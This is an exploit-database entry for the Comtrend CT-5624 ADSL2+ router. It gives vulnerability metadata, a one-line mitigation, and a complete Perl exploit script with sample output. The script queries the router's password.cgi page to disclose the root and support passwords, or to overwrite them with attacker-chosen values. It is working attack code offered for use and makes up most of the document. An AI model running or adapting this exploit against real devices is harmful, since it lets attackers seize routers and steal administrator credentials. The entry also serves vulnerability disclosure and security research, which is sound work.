Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit

vendor:

CT-5624 ADSL2+ Ethernet Router

by:

Todor Donev

7.5

CVSS

HIGH

Remote

N/A

CWE

Product Name: CT-5624 ADSL2+ Ethernet Router

Affected Version From: A011-306TSR-C01_R03

Affected Version To: A111-312BTC-C01_R12

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit

This exploit allows an attacker to remotely disclose or change the root/support password of Comtrend Router CT-5624. The exploit is written in Perl and uses the LWP::Simple module to send a GET request to the router's password.cgi page. The exploit has been tested on two different versions of the router, CT-5624 and CT-5637.

Mitigation:

The user should update the router's firmware to the latest version and ensure that the router is not exposed to the public internet.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#  [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
#
#  Author: Todor Donev
#  Email: todor.donev@@gmail
#  Type: Hardware
#  Vuln Type: Remote
# 
#  Tested:
#  Board ID    : CT-5624
#  Software    : A011-306TSR-C01_R03
#  Bootloader  : 1.0.37-0.7-3
#  ADSL        : A2pB022c3.d20e
#
#  Board ID    : CT-5637
#  Software    : A111-312BTC-C01_R12
#  Bootloader  : 1.0.37-12.1-1
#  ADSL        : A2pB023k.d20k_rc2
#
#####
#  CT-5624 ADSL2+ Ethernet Router
#  The CT-5624 series ADSL2+ compact and high performance Ethernet router 
#  provides four 10/100 Ethernet Interfaces, and one ADSL line interface 
#  to access the Internet, incorporating LAN or Video on Demand over one 
#  ordinary telephone line, at speeds of up to 24 Mbps. It also has full 
#  routing capabilities to segment/route IP protocol, and supports advanced 
#  security functions. 
#####
#
#  playground$ perl comtrend.pl -c 192.168.1.1:80
#  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
#  [!] Target: 192.168.1.1:80
#  [o] New root password: root31337
#  [o] New support password: sup31337
#  [*] Successfully !!
##
#  playground$ perl comtrend.pl -d 192.168.1.1:80
#  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
#  [!] Target: 192.168.1.1:80
#  [o] root: root31337
#  [o] support: sup31337
##
#  playground$ perl comtrend.pl
#  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
#  [!] usg: perl comtrend.pl [-c or -d] <victim>
#  [!]  -d: Disclosure Root/Support password
#  [!]  -c: Change Root/Support password
#
#####
#  Thanks to Tsvetelina Emirska 
#  for the help and support which gives me =)
#####

use LWP::Simple;
print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
if ($type eq "-d") {
my $r = get("http://$t/password.cgi") or die("suck!");
print "[!] Target: $t\n";
if ($r =~ m/pwdAdmin = '(.*)';/g) {
$result .= "[o] root: $1\n";
}     
if ($r =~ m/pwdSupport = '(.*)';/g) {
$result .= "[o] support: $1\n";
print $result; 
}}}
if ($type eq "-c") {
print "[!] Target: $t\n";
print "[o] New root password: ";
my $rootpass=<STDIN>;
chomp($rootpass);
print "[o] New support password: ";
my $suppass=<STDIN>;
chomp($suppass);
my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
if ($r =~ m/pwdAdmin = '$rootpass';/g) {
print "[*] Successfully !!\n";
}}
sub usg(){
print "[!] usg: perl comtrend.pl [-c or -d] <victim>\n";
print "[!]  -d: Disclosure Root/Support password\n";
print "[!]  -c: Change Root/Support password\n";
exit;
}